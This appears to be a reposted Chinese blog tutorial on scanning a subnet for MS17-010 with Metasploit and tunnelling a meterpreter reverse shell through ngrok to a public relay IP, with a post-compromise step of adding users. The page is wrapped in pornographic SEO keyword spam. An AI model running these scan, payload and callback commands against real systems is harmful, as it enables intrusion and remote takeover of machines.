日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

MS17-010漏洞检测与内网穿透技术的应用

發(fā)布時(shí)間:2024/1/18 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 MS17-010漏洞检测与内网穿透技术的应用 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

0x00 前言

本文主要介紹一下MSF模塊的下載、使用,以及當(dāng)攻擊機(jī)處于內(nèi)網(wǎng),而目標(biāo)機(jī)也處于內(nèi)網(wǎng)的解決方法。這里借助MS17-010漏洞來(lái)具體講解一下,并沒(méi)有新的知識(shí)點(diǎn),可以為剛?cè)腴T(mén)的新手拋磚引玉,提供一條解決問(wèn)題的思路,同時(shí)也記錄一下過(guò)程,加強(qiáng)記憶。
主要分為兩個(gè)知識(shí)點(diǎn),一是SMB漏洞的批量檢測(cè),二是內(nèi)網(wǎng)穿透技術(shù)。

首先是環(huán)境的搭建,具體如下表所示:

主機(jī)IP備注
Kali 64位192.168.232.134攻擊機(jī)
Windows XP 32位192.168.232.128安裝了python2.6,下載有方程式利用工具包(主要為Windows目錄下的工具)
Window2008 R2 64位10.50.2.62靶機(jī),存在MS17-010漏洞,并可以訪問(wèn)外網(wǎng)

0x01 SMB漏洞批量檢測(cè)

1.掃描腳本的下載和加載

由于Metasploit還沒(méi)有更新MS17-010檢測(cè)的模塊,所以要去exploit-db下載,并在MSF中加載。

root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb


啟動(dòng)Metasploit,模塊會(huì)自動(dòng)加載,或者使用命令reload_all重新加載所有模塊。

2.漏洞掃描的使用方法

選擇使用smb_ms_17_010模塊,并查看使用命令。

msf > use auxiliary/scanner/smb/smb_ms_17_010 msf auxiliary(smb_ms_17_010) > show options


所必須的參數(shù)有三個(gè),對(duì)于無(wú)需登錄的SMB,我們只需設(shè)置一下掃描的IP段、線程并運(yùn)行即可開(kāi)始掃描。

msf auxiliary(smb_ms_17_010) > set RHOSTS 10.50.2.1-255 RHOSTS => 10.50.2.1-255 msf auxiliary(smb_ms_17_010) > set THREADS 10 THREADS => 10 msf auxiliary(smb_ms_17_010) > run


出現(xiàn)黃色警告的表示可能存在,需要進(jìn)一步驗(yàn)證。
為了方便將存在漏洞的IP列出來(lái),寫(xiě)了一個(gè)簡(jiǎn)單的Python腳本。

import re if __name__ == '__main__': f = open("smb.txt", mode='r', buffering=1) while(True): line = f.readline() if line : if "likely" in line: print line.split(' ')[1].split(':')[0] else: break

提取出的IP如下所示:

..... 10.50.2.52 10.50.2.62 10.50.2.65 10.50.2.61 10.50.2.63 10.50.2.64 10.50.2.76 10.50.2.69 10.50.2.77 10.50.2.78 10.50.2.79 ....

有了存在漏洞的地址,接下來(lái)將開(kāi)始對(duì)其進(jìn)行驗(yàn)證,以10.50.2.62為例。
由于Kali在虛擬機(jī),宿主機(jī)IP為2.0..,目標(biāo)機(jī)在10.50.2.*。相當(dāng)于需要從內(nèi)網(wǎng)到另一個(gè)內(nèi)網(wǎng), 選擇采用了ngrok進(jìn)行tcp的端口轉(zhuǎn)發(fā)來(lái)實(shí)現(xiàn)內(nèi)網(wǎng)的穿透。

0x02 內(nèi)網(wǎng)穿透

這里采用了www.ngrok.cc平臺(tái)進(jìn)行演示,類似這樣的平臺(tái)有很多,例如natapp.cn等。
注冊(cè)并開(kāi)通隧道,如圖所示。


下載對(duì)應(yīng)的客戶端,下載地址為:https://www.ngrok.cc/#down-client?,選擇與系統(tǒng)對(duì)應(yīng)的軟件。
我這里Kali為64位的,下載和使用命令如下:

root@kali:~/Downloads# wget hls.ctopus.com/sunny/linux_amd64.zip root@kali:~/Downloads# unzip linux_amd64.zip root@kali:~/Downloads# cd linux_amd64/ root@kali:~/Downloads/linux_amd64# ls root@kali:~/Downloads/linux_amd64# ./sunny clientid 隧道ID


出現(xiàn)下圖的界面表示運(yùn)行成功。

使用如下命令生成用于監(jiān)聽(tīng)的dll文件。監(jiān)聽(tīng)的IP為server.ngrok.cc的地址,端口為開(kāi)通隧道時(shí)填寫(xiě)的遠(yuǎn)程端口。

root@kali:~/Documents# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=6266 -f dll > got.dll


然后在Kali上設(shè)置監(jiān)聽(tīng)本機(jī)的IP和端口,也就是在開(kāi)通隧道時(shí)填寫(xiě)的本地端口。

use exploit/multi/handler set LHOST 192.168.232.134 set LPORT 5555 set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > exploit


由于關(guān)于Eternalblue利用方法有很多教程了,這里就不詳細(xì)說(shuō)明了,如圖所示。



攻擊成功時(shí)查看ngrok客戶端發(fā)現(xiàn)有一個(gè)連接。

而且Kali上也生成了一個(gè)meterpreter會(huì)話。

之后的操作就很簡(jiǎn)單了,可以添加用戶等等。
最后遠(yuǎn)程登錄成功如下圖所示。

使用natapp也是可以的。

0x03 總結(jié)

本文主要以MS17-010為例,講解了如何下載和利用Metasploit中沒(méi)有的模塊,以及如何解決內(nèi)網(wǎng)到內(nèi)網(wǎng)的穿透的問(wèn)題,當(dāng)然解決的方法還有很多,這里就不再介紹了。

沒(méi)有什么新的知識(shí),怕忘記所以記錄一下~~

0x04 參考

[1]https://www.exploit-db.com/exploits/41891/
[2]http://bobao.360.cn/learning/detail/3041.html

總結(jié)

以上是生活随笔為你收集整理的MS17-010漏洞检测与内网穿透技术的应用的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 欧美成人自拍视频 | 国产精品情侣自拍 | av毛片在线免费观看 | 国产乱码精品一区二区三 | 天天av天天干 | 蜜臀久久99精品久久一区二区 | 大地资源二中文在线影视观看 | 无码精品国产一区二区三区免费 | 在线黄色观看 | 国产精品视频第一页 | 国产成人自拍视频在线观看 | 伊人草草 | 国产欧美日韩精品一区二区三区 | 午夜少妇福利 | 青娱乐在线视频免费观看 | 污污视频免费看 | av免费在线观看不卡 | 亚洲一区二区免费视频 | 91精品福利 | 久草色在线 | 国产一区二区三区免费观看视频 | 亚洲h片 | 西西人体做爰大胆gogo直播 | 久久精品免费观看 | 日本成人久久 | 国产三级三级三级 | 玖玖zyz| 色偷偷资源| 99热免费在线观看 | 蜜桃臀av | 久久艹国产 | 国产精品高清无码在线观看 | 超碰人人干人人 | 精品少妇一区二区三区在线观看 | 简单av网| 蘑菇福利视频一区播放 | 中文字幕乱码在线 | 国产美女www爽爽爽 www.国产毛片 | 中文在线字幕 | 三级免费毛片 | 欧美精品播放 | 国产一区二区在线观看视频 | 日韩伦理中文字幕 | 日韩精品一区二区三区四区 | 校园sm主奴调教1v1罚视频 | 欧美精品网 | 好吊视频一二三区 | 羞羞动漫在线观看 | 香蕉福利| 国内精品少妇 | 毛片88| 午夜影院| 国产又粗又黄又爽又硬的视频 | 黑人一级| 在线中文字幕日韩 | 日韩aa视频 | 美女精品网站 | 欧美一区二区激情视频 | 黄色a级片视频 | 欧美操女人| 波多野结衣视频网址 | 日韩一区二区三区视频 | 男人操女人的软件 | 天天操天天射天天爱 | 亚洲欧美日韩久久精品 | 夜夜爱视频 | 日本熟妇色xxxxx日本免费看 | 成人av网站大全 | 深田咏美av在线 | 极品白嫩少妇无套内谢 | 麻豆网站入口 | 正在播放adn156松下纱荣子 | 91沈先生在线 | 韩国三色电费2024免费吗怎么看 | 无码国模国产在线观看 | 久久国产免费 | 操你啦免费视频 | 欧美一区二区三区色 | 91麻豆免费视频 | 国产一级免费观看 | 夜夜躁狠狠躁日日躁av | av大片免费观看 | 午夜国产一区二区三区 | 国产日产欧美一区二区三区 | 四色成人 | 天天操夜夜操夜夜操 | 全黄性高潮 | 五月婷婷在线播放 | 国产精品久久久久影院色老大 | 久久无码人妻精品一区二区三区 | 久久久天堂国产精品女人 | 黄色在线免费播放 | 久久影视中文字幕 | 欧美大波大乳巨大乳 | 在线视频a | 日日躁夜夜躁aaaabbbb | 国偷自拍| 天天干夜夜夜 | 1000部啪啪未满十八勿入 |